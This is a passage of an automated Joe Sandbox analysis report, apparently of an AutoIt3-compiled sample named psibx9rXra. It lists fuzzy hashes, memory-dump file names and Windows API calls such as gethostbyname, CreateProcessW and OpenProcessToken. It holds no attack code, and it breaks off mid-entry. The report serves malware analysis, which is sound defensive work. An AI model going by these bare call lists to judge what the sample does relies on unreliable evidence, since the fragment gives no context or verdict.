                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                • String ID:
                                                • API String ID: 1378193009-0
                                                • Opcode ID: 5432061796f84dddd2e833f9e28104895e6488bf150c314935bd8c16998e6226
                                                • Instruction ID: 01d9001c0ddc6076014afb17cf6e839e6d156331adc8e55a99106cf2e21d8143
                                                • Opcode Fuzzy Hash: 5432061796f84dddd2e833f9e28104895e6488bf150c314935bd8c16998e6226
                                                • Instruction Fuzzy Hash: DF210AB5904394DFE733DB24C845BEABBECAF01314F04008EE6DE5A141D3752984EB42
                                                APIs
                                                  • Part of subcall function 00F85A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE7896,?,?,00000000), ref: 00F85A2C
                                                  • Part of subcall function 00F85A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE7896,?,?,00000000,?,?), ref: 00F85A50
                                                • gethostbyname.WSOCK32(?,?,?), ref: 00FF6399
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF63A4
                                                • _memmove.LIBCMT ref: 00FF63D1
                                                • inet_ntoa.WSOCK32(?), ref: 00FF63DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                • String ID:
                                                • API String ID: 1504782959-0
                                                • Opcode ID: d904f2a3cbdec24917e9daba7b8507342ca1fd8f932e2a48a030b8b25d7d1e66
                                                • Instruction ID: 62a684439a2ca1be18734bc081b0789b530c51b7962a7a02089af2bf62d40f64
                                                • Opcode Fuzzy Hash: d904f2a3cbdec24917e9daba7b8507342ca1fd8f932e2a48a030b8b25d7d1e66
                                                • Instruction Fuzzy Hash: 37115E3650010AAFCB15FBA4DD86CFEB7B8AF08310B144065F506A7261DF39AE04FBA1
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD8B61
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8B73
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8B89
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD8BA4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                                                • Instruction ID: 27ab7d62c71e0cd2d4d091410661c73ecb65d90e74860eda31e57da939766823
                                                • Opcode Fuzzy Hash: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                                                • Instruction Fuzzy Hash: D5114C79900218FFDB11DFA5CC84F9DBB75FB48750F204096E900B7250DA716E11EB94
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                                                • GetClientRect.USER32(?,?), ref: 00FBB5FB
                                                • GetCursorPos.USER32(?), ref: 00FBB605
                                                • ScreenToClient.USER32(?,?), ref: 00FBB610
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: 3b633120ead8bd4ba55e09fc147b8842a46f993570bffeed75c44a87ce84ffe5
                                                • Instruction ID: a97b8acbf0f7ad1dff71e7cb8548e96c30916519ce5d2cb7d982e2430f47591e
                                                • Opcode Fuzzy Hash: 3b633120ead8bd4ba55e09fc147b8842a46f993570bffeed75c44a87ce84ffe5
                                                • Instruction Fuzzy Hash: FD116A35A0011AEFCB20EFA8D8859EE77B8FB05311F000556FA41E3140C735BA52ABA5
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FDFCED,?,00FE0D40,?,00008000), ref: 00FE115F
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FDFCED,?,00FE0D40,?,00008000), ref: 00FE1184
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FDFCED,?,00FE0D40,?,00008000), ref: 00FE118E
                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,00FDFCED,?,00FE0D40,?,00008000), ref: 00FE11C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: f8b6bb1c09f72450dac5e498c2e09b5c917da0923bd887376d4bf1fbea89ed34
                                                • Instruction ID: 333a1add045a3d1e3363a4ce9e8c42afb48d5bf1e8635e0ff5a8ab7ca92eb437
                                                • Opcode Fuzzy Hash: f8b6bb1c09f72450dac5e498c2e09b5c917da0923bd887376d4bf1fbea89ed34
                                                • Instruction Fuzzy Hash: 50113C32D0065DDBCF149FA6D848AEEBB7CFF0A751F104045EA81B2244CB799550EBE6
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FDD84D
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FDD864
                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FDD879
                                                • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FDD897
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Type$Register$FileLoadModuleNameUser
                                                • String ID:
                                                • API String ID: 1352324309-0
                                                • Opcode ID: 27341d895ec514e59efb3b3211f1ce065807bfe92d656bf073776a6f6f3712e2
                                                • Instruction ID: 1f82f5ad07b4aa5d86316339f21cb4964dabad4ad7c21a1c6850477e2490bfe8
                                                • Opcode Fuzzy Hash: 27341d895ec514e59efb3b3211f1ce065807bfe92d656bf073776a6f6f3712e2
                                                • Instruction Fuzzy Hash: 1A11A171602305DBE3318F50EC08F96BBBDEB00B00F14856AAA56C6280D7B1E508FBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction ID: 44ada012c0748e6d715c7bfbd2adf2cff1c16ade44e94158f1e678028b1cafc9
                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                • Instruction Fuzzy Hash: 8C014E7244824EBBCF166E85CC01CED3F62BB58390F598416FA1858031D336D9B1BF81
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 0100B2E4
                                                • ScreenToClient.USER32(?,?), ref: 0100B2FC
                                                • ScreenToClient.USER32(?,?), ref: 0100B320
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0100B33B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                                                • Instruction ID: ef3794a4c6461eb62cd2299f6273f7843bbfc759c2b4c34c091ba0ba09ccd94c
                                                • Opcode Fuzzy Hash: d3391d64f0d82ec806f3f31c171d08a3c79579ed12561f84f31342885b060c83
                                                • Instruction Fuzzy Hash: 7E1174B9D0020AEFDB51DFA9C8849EEBBF9FF08210F108156E954E3210D735AA519F50
                                                APIs
                                                • _memset.LIBCMT ref: 0100B644
                                                • _memset.LIBCMT ref: 0100B653
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01046F20,01046F64), ref: 0100B682
                                                • CloseHandle.KERNEL32 ref: 0100B694
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID:
                                                • API String ID: 3277943733-0
                                                • Opcode ID: 800eea16ea20806114982031eab7f2a3092f9e0e2a1adbb859c3c73a29d61901
                                                • Instruction ID: a40ee09322a4a9e46984370353d8ea12193eee52059d104c330ffe35cb30e54e
                                                • Opcode Fuzzy Hash: 800eea16ea20806114982031eab7f2a3092f9e0e2a1adbb859c3c73a29d61901
                                                • Instruction Fuzzy Hash: 07F089F56403007BF2212765AC45F7B3A9CEB0A755F404020FEC8D5186E77B4C0097A8
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 00FE6BE6
                                                  • Part of subcall function 00FE76C4: _memset.LIBCMT ref: 00FE76F9
                                                • _memmove.LIBCMT ref: 00FE6C09
                                                • _memset.LIBCMT ref: 00FE6C16
                                                • LeaveCriticalSection.KERNEL32(?), ref: 00FE6C26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                • String ID:
                                                • API String ID: 48991266-0
                                                • Opcode ID: 85ac48161ea0ae4f291b6e5b50dba709955fbfb3ca404cce2008402413d17dd4
                                                • Instruction ID: 5c1e6b913bd03a6b2ab513839c6c796bf5153b1c13527b4c9687e1f1b09934c7
                                                • Opcode Fuzzy Hash: 85ac48161ea0ae4f291b6e5b50dba709955fbfb3ca404cce2008402413d17dd4
                                                • Instruction Fuzzy Hash: 9DF0547A200100ABCF116F55DC85A4ABF29EF45360F048051FE089E217C736E811EBB4
                                                APIs
                                                  • Part of subcall function 00F812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                                                  • Part of subcall function 00F812F3: SelectObject.GDI32(?,00000000), ref: 00F8135C
                                                  • Part of subcall function 00F812F3: BeginPath.GDI32(?), ref: 00F81373
                                                  • Part of subcall function 00F812F3: SelectObject.GDI32(?,00000000), ref: 00F8139C
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0100BD40
                                                • LineTo.GDI32(00000000,?,?), ref: 0100BD4D
                                                • EndPath.GDI32(00000000), ref: 0100BD5D
                                                • StrokePath.GDI32(00000000), ref: 0100BD6B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                • String ID:
                                                • API String ID: 1539411459-0
                                                • Opcode ID: ea0b92b4e909b7604fadc4803c1e74b2e85881a4fa20d8bef2942d9c53405f1a
                                                • Instruction ID: ba3cc0dc6671d1ab9fae03b80eae809fd0b1f91f1b5bc82a7d070313b6abf3d4
                                                • Opcode Fuzzy Hash: ea0b92b4e909b7604fadc4803c1e74b2e85881a4fa20d8bef2942d9c53405f1a
                                                • Instruction Fuzzy Hash: BAF0BE3500025ABBEB33AF54AC09FCE3F98AF06310F048000FA90210D1CBBA0161EB95
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 00F82231
                                                • SetTextColor.GDI32(?,000000FF), ref: 00F8223B
                                                • SetBkMode.GDI32(?,00000001), ref: 00F82250
                                                • GetStockObject.GDI32(00000005), ref: 00F82258
                                                • GetWindowDC.USER32(?,00000000), ref: 00FBBE83
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FBBE90
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00FBBEA9
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 00FBBEC2
                                                • GetPixel.GDI32(00000000,?,?), ref: 00FBBEE2
                                                • ReleaseDC.USER32(?,00000000), ref: 00FBBEED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                • String ID:
                                                • API String ID: 1946975507-0
                                                • Opcode ID: 61a291e6cb02f97fa348f3c3eb2234ebabc4d96e1df5a329305e1347dba82059
                                                • Instruction ID: ef544d03788c679c01b211087d16617e04a9dadef20aa41a691089364e5ff459
                                                • Opcode Fuzzy Hash: 61a291e6cb02f97fa348f3c3eb2234ebabc4d96e1df5a329305e1347dba82059
                                                • Instruction Fuzzy Hash: ADE03932504245ABEB725FA4E80D7D83B10EB06332F008366FAA9480E587B64990EF12
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 00FD871B
                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FD82E6), ref: 00FD8722
                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FD82E6), ref: 00FD872F
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FD82E6), ref: 00FD8736
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: CurrentOpenProcessThreadToken
                                                • String ID:
                                                • API String ID: 3974789173-0
                                                • Opcode ID: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                                                • Instruction ID: b65acc8322750617c9f38722d4f371a391a44c5494e9e348d07766f121ae9810
                                                • Opcode Fuzzy Hash: f78426746d70450c0e0df9446f0fc34a6070ac52630edcfc4013295363014b07
                                                • Instruction Fuzzy Hash: BEE08636A112129BD7309FF45D0CB563BACEF507E1F148818B2C5CA044DA398442E750
                                                APIs
                                                • OleSetContainedObject.OLE32(?,00000001), ref: 00FDB4BE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ContainedObject
                                                • String ID: AutoIt3GUI$Container
                                                • API String ID: 3565006973-3941886329
                                                • Opcode ID: d6b5cb1b651ebe551bd33ccaf02a044a0c98434d792f3a34716c89e4f7f4a29c
                                                • Instruction ID: 87d7a5ebd2b49a716b139aaf91577de1c2e084ed60321dd1d68b1af36b4fe76b
                                                • Opcode Fuzzy Hash: d6b5cb1b651ebe551bd33ccaf02a044a0c98434d792f3a34716c89e4f7f4a29c
                                                • Instruction Fuzzy Hash: 989148B1600601EFDB14DF64C884B6AB7EAFF49710F29856EE94ACB391DB70E841DB50
                                                APIs
                                                  • Part of subcall function 00F9FC86: _wcscpy.LIBCMT ref: 00F9FCA9
                                                  • Part of subcall function 00F89837: __itow.LIBCMT ref: 00F89862
                                                  • Part of subcall function 00F89837: __swprintf.LIBCMT ref: 00F898AC
                                                • __wcsnicmp.LIBCMT ref: 00FEB02D
                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FEB0F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                • String ID: LPT
                                                • API String ID: 3222508074-1350329615
                                                • Opcode ID: a0a09fe5c3d2e0e97338cce439d2f617df8bd61fe07f56517cafa301f00df3b1
                                                • Instruction ID: 37f0d7b767d194b50da7bc0c388fede2efb7b32bb32e63554293ba3c8c52f51a
                                                • Opcode Fuzzy Hash: a0a09fe5c3d2e0e97338cce439d2f617df8bd61fe07f56517cafa301f00df3b1
                                                • Instruction Fuzzy Hash: 24619172E00215AFCB14EF95C891EEFB7B4EF08320F04406AF916AB251D774AE44EB50
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00F92968
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F92981
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
